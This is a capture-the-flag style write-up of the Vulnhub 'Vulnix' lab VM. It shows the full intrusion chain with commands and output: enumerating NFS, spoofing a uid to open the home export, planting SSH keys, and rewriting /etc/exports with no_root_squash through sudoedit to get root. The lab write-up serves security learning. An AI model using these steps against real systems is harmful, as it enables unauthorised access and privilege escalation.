Vulnhub - Vulnix Writeup
Description
Vulnhub - Vulnix. Here we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions (well at the time of release anyway!)
The host is based upon Ubuntu Server 12.04 and is fully patched as of early September 2012.
The goal; boot up, find the IP, hack away and obtain the trophy hidden away in /root by any means you wish – excluding the actual hacking of the vmdk
Free free to contact me with any questions/comments using the comments section below.
Enjoy!
Enumeration
Nmap
kali@kali:~/Desktop/tools/autorecon/results/vulnix.com/scans$ cat _full_tcp_nmap.txt | grep open
22/tcp open ssh syn-ack ttl 64 OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp syn-ack ttl 64 Postfix smtpd
79/tcp open finger syn-ack ttl 64 Linux fingerd
110/tcp open pop3 syn-ack ttl 64 Dovecot pop3d
111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000)
143/tcp open imap syn-ack ttl 64 Dovecot imapd
512/tcp open exec syn-ack ttl 64 netkit-rsh rexecd
513/tcp open login syn-ack ttl 64 OpenBSD or Solaris rlogind
514/tcp open tcpwrapped syn-ack ttl 64
993/tcp open ssl/imaps? syn-ack ttl 64
995/tcp open ssl/pop3s? syn-ack ttl 64
2049/tcp open nfs_acl syn-ack ttl 64 2-3 (RPC #100227)
38531/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
39828/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
45132/tcp open status syn-ack ttl 64 1 (RPC #100024)
49548/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)
52773/tcp open nlockmgr syn-ack ttl 64 1-4 (RPC #100021)
Quite a lot of open ports, mainly email related ports.
NFS
We have a nfs running on port 2049. Check the details using showmount.
kali@kali:~$ sudo showmount -e vulnix.com
Export list for vulnix.com:
/home/vulnix *
kali@kali:~$
So we can mount /home/vulnix on our system and access the file contents.
kali@kali:/tmp$ sudo mount vulnix.com:/home/vulnix /tmp/vulnix/
But trying to access the share fails.
kali@kali:/tmp$ cd vulnix/
bash: cd: vulnix/: Permission denied
kali@kali:/tmp$ stat vulnix/
File: vulnix/
Size: 4096 Blocks: 8 IO Block: 32768 directory
Device: 2fh/47d Inode: 32917 Links: 4
Access: (0750/drwxr-x---) Uid: (65534/ nobody) Gid: (4294967294/ UNKNOWN)
Access: 2020-04-25 01:50:44.984072401 -0400
Modify: 2020-04-24 23:01:51.903253225 -0400
Change: 2020-04-24 23:01:51.903253225 -0400
Birth: -
The share seems to be owned by uid 65534 and gid 4294967294. This is because of a security feature in NFS 4. To access a locally mounted share, your uid and gid need to match the ones of the shared directory on the server.
Unfortunately, for security reasons, NFS 4 doesn’t show the real remote uid and gid, but the ones corresponding to the nobody user and group. But NFS 3 displays the uid and gid of the remote user. Lets see if we can mount it using NFS 3.
kali@kali:/tmp$ sudo mount -o v3 vulnix.com:/home/vulnix /tmp/vulnix/
kali@kali:/tmp$ stat vulnix/
File: vulnix/
Size: 4096 Blocks: 8 IO Block: 4096 directory
Device: 2dh/45d Inode: 32917 Links: 4
Access: (0750/drwxr-x---) Uid: ( 2008/ UNKNOWN) Gid: ( 2008/ UNKNOWN)
Access: 2020-04-25 01:50:44.984072401 -0400
Modify: 2020-04-24 23:01:51.903253225 -0400
Change: 2020-04-24 23:01:51.903253225 -0400
Birth: -
We can see that the file belongs to a user with uid 2008. We can create a user with uid 2008. Or alternatively, we can use to use NfSpy, which essentially automates this process (but spoofs the uid and gid instead of actually creating an user).
Low Shell
NfSpy is spitting our errors in my system, so I won’t be using it. Create a user with uid 2008 to access the share.
root@kali:/tmp$ sudo useradd -u 2008 vulnix -p vulnix
root@kali:/tmp# su vulnix
$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
$ cd /tmp/vulnix
$ ls -la
total 164
drwxr-x--- 4 vulnix vulnix 4096 Apr 24 23:01 .
drwxrwxrwt 16 root root 4096 Apr 26 12:39 ..
-rw-r--r-- 1 vulnix vulnix 220 Apr 3 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Apr 3 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Apr 3 2012 .profile
Create ssh keys and add it to authorized_keys.
$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/vulnix/.ssh/id_rsa): /tmp/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /tmp/id_rsa.
Your public key has been saved in /tmp/id_rsa.pub.
The key fingerprint is:
SHA256:cjzGBLkXvS3bSIkrck75gFkhgr1WWRh2EIZDbHG7boA vulnix@kali
The keys randomart image is:
+---[RSA 3072]----+
| =ooBB+. . |
|. B+=oo.. . |
| . =.. o.o + |
| .o .o+o = . |
|E.. .+.oSo = |
| o+ *+..o . |
| o= + |
| . . . |
| |
+----[SHA256]-----+
$ cd vulnix
$ mkdir .ssh
$ cp /tmp/id_rsa.pub ./.ssh/authorized_keys
$ cd .ssh
$ ls -la
total 12
drwx------ 2 vulnix vulnix 4096 Apr 24 22:28 .
drwxr-x--- 4 vulnix vulnix 4096 Apr 24 23:01 ..
-rw------- 1 vulnix vulnix 565 Apr 26 12:53 authorized_keys
Login using the private key.
root@kali:/tmp# ssh vulnix@vulnix.com -i /tmp/id_rsa
Warning: Permanently added the ECDSA host key for IP address '192.168.1.4' to the list of known hosts.
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Sun Apr 26 17:55:58 BST 2020
System load: 0.0 Processes: 89
Usage of /: 90.3% of 773MB Users logged in: 0
Memory usage: 7% IP address for eth0: 192.168.1.4
Swap usage: 0%
=> / is using 90.3% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Sat Apr 25 06:50:41 2020 from 192.168.1.6
vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix)
vulnix@vulnix:~$
Root Shell
Check sudo permissions of the user.
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$ sudoedit /etc/exports
We can edit the config used for NFS mount and change it to mount the root directory.
NFS Config
GNU nano 2.2.6 File: /var/tmp/exports.XXSHUwwz Modified
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
#/home/vulnix *(rw,root_squash)
/ *(rw,no_root_squash)
We have to disable root_squash and then restart the box manually. I couldn’t find any other way to restart the machine. Mount it again after restarting the system and add our ssh keys to root directory to gain root access.
root@kali:/tmp# sudo mount -o v3 vulnix.com:/ /tmp/vulnroot/
root@kali:/tmp# cd vulnroot/
root@kali:/tmp/vulnroot# ls
bin boot dev etc home initrd.img lib lost+found media mnt opt proc root run sbin selinux srv sys tmp usr var vmlinuz
root@vulnix.com:/:/> mkdir /root/.ssh/
root@vulnix.com:/:/> cp /home/vulnix/.ssh/authorized_keys /root/.ssh/authorized_keys
Login using private key to get root shell.
kali@kali:/tmp$ sudo ssh root@vulnix.com -i id_rsa
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Sun Apr 26 18:13:51 BST 2020
System load: 0.0 Processes: 88
Usage of /: 90.3% of 773MB Users logged in: 0
Memory usage: 7% IP address for eth0: 192.168.1.4
Swap usage: 0%
=> / is using 90.3% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
Last login: Sat Apr 25 08:02:56 2020 from 192.168.1.6
root@vulnix:~# id
uid=0(root) gid=0(root) groups=0(root)
